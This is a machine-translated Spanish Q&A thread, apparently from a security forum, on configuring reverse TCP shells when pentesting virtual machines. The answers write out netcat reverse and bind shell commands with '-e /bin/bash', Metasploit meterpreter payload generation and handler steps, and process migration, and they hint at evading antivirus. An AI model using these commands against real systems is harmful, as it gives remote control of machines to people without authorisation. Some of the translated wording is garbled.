¿Cómo configurar la conexión tcp inversa cuando se hace un pentesting en máquinas virtuales?

0

msfconsole es una herramienta atractiva de pentesting de código abierto de metasploit .

Una vez que el exploit es válido, podemos establecer la carga útil para la víctima. Para una conexión persistente, podemos necesitar un medidor de metro.

Pero a menudo probamos la seguridad en máquinas virtuales que ejecutan msfconsole.

Sin IP pública, ¿la PC víctima puede conectarse a nuestro servidor local en máquinas virtuales?

Algunas sugerencias?

    
pregunta dotslash 12.08.2016 - 11:29
fuente

3 respuestas

1

enlazar shell: esto le permite configurar un puerto para escuchar en su conexión local para los puertos entrantes, por ejemplo. nc -nvlp 8080 -e /bin/bash ... esto debería abrir una conexión a un entorno bash una vez que la máquina remota se conecte a su dirección IP de red.

Invertir shell: configure un shell de enlace en su máquina PROPIA sin el -e / bin / bash ... y luego ejecute nc -nv YOUR.IP.ADDR.HERE 8080 -e /bin/bash en la máquina victum.

¿Parece que una de tus conexiones está detrás de un NAT? y por lo tanto no IP? si esto es cierto, entonces debes configurar nc -nvlp 8080 en cada ubicación que tenga una dirección IP con la que puedas trabajar.

Sé que dijiste metasploit pero esta es una buena manera de explicar y entender las diferencias de conexión.

así que con metasploit puedes probar reverse_tcp o bind_tcp payload

    
respondido por el TheHidden 12.08.2016 - 12:34
fuente
1

Saber que estás usando Metasploit es una buena señal, solo señala eso.

Primero, debe crear una carga útil haciendo lo siguiente:

 msfpayload windows/metepreter/reverse_tcp LHOST="your local IP without quotations" LPORT="any specified port you operate on" X > filenamehere.exe

A continuación, siga estos pasos en orden por número al escribir en el terminal:

1. msfconsole

2. use exploit/multi/handler

3. set PAYLOAD windows/meterpreter/reverse_tcp

4. set LHOST "ip you used when creating the payload in the first step without quotations"

5. set LPORT "port you used when creating the payload in the first step without quotations"

6. exploit

Después de escribir exploit, y si se sigue correctamente, aparecerá un mensaje en el terminal como este:

[*] Started reverse handler on "IP Address"
[*] Starting the payload handler...

Ahora, con la carga útil que creó en el primer paso, desea ejecutarla en la máquina que está clasificando como la "víctima". Por supuesto, esto no funcionará si tiene un antivirus porque no ha sido cifrado por un cifrador o codificado con código basura para ocultar la carga útil (la carga útil). Una vez que ejecute la carga útil en la computadora víctima, obtendrá una sesión meterpreter dentro de su terminal.

Cuando estás en la sesión meterpreter , lo primero que debes hacer es migrar a explorer.exe y puedes hacerlo escribiendo lo siguiente en tu terminal:

ps (shows the current running processes on the computer with a number ID on the left of it)

migrate (id of explorer.exe)

Diviértete con tu sesión de meterpreter.

  

Sin IP pública, ¿la PC víctima puede conectarse a nuestro servidor local en máquinas virtuales?

Esto es posible, pero eso depende. Si la IP de su máquina virtual es local en su computadora, generalmente se asignará a un 198 IP. Eso es lo que siempre pasa conmigo de todos modos, por lo que se vuelve inútil para la "víctima", ya que es una IP local. Si no cifra su conexión TCP a través de VPN y la víctima tiene el conocimiento correcto, digamos, puede ver sus registros de conexión, ver sus conexiones entrantes y salientes, y sus conexiones no están cifradas y su IP pública está en a simple vista, puede ser capaz de DOX o obtener información con cualquier método que conozca.

Espero que ayude.

    
respondido por el iZodiac 12.08.2016 - 18:57
fuente
0

Por lo que sé, puede configurar su VM para que el sistema operativo invitado comparta la interfaz de red física con el host. En ese caso si empiezas

nc -nlvp 8080

el oyente también está escuchando hacia el mundo exterior. Eso debería hacer el truco.

    
respondido por el kaidentity 12.08.2016 - 16:09
fuente

Lea otras preguntas en las etiquetas